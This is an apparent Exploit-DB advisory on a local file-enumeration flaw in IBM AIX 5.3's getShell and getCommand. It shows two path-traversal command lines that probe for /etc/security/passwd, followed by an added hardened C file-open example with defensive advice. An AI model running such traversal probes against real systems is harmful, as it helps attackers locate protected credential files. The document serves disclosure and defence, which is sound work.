IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration

EDB-ID: 26996
Author: xfocus
Type: local
Platform: AIX
Date: 2005-12-30

source: https://www.securityfocus.com/bid/16102/info

IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.

-bash-3.00$ ./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$ ./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
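
The two runs above differ only in whether fopen reports an error, and that difference is what tells the caller whether the file exists. A hardened lookup for this class of bug follows, as an added example that is not IBM's code and not part of the original advisory. The names open_command_file and is_plain_name and the fixed error text are hypothetical, and the example assumes that command files live in a single directory.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper, not AIX source: accept only a single path component. */
static int is_plain_name(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    return strchr(name, '/') == NULL;   /* no separators, so no "../" climbing */
}

/*
 * Open `name` inside `base_dir` only. Returns a read-only fd, or -1 for
 * every failure, so a missing file and a refused path are indistinguishable
 * to the caller.
 */
int open_command_file(const char *base_dir, const char *name)
{
    int dirfd, fd;

    if (!is_plain_name(name))
        return -1;
    dirfd = open(base_dir, O_RDONLY | O_DIRECTORY);
    if (dirfd < 0)
        return -1;
    /* O_NOFOLLOW: a symlink planted in base_dir cannot redirect the open. */
    fd = openat(dirfd, name, O_RDONLY | O_NOFOLLOW);
    close(dirfd);
    return fd < 0 ? -1 : fd;
}

int main(int argc, char **argv)
{
    int fd = (argc == 3) ? open_command_file(argv[1], argv[2]) : -1;
    if (fd < 0) {
        /* One fixed message; errno text such as ENOENT is never echoed. */
        fputs("cannot open command file\n", stderr);
        return 1;
    }
    close(fd);
    return 0;
}
```

A helper that runs with more privilege than its caller should also perform the open under the caller's real uid, so that the kernel's own permission checks apply to the requested file.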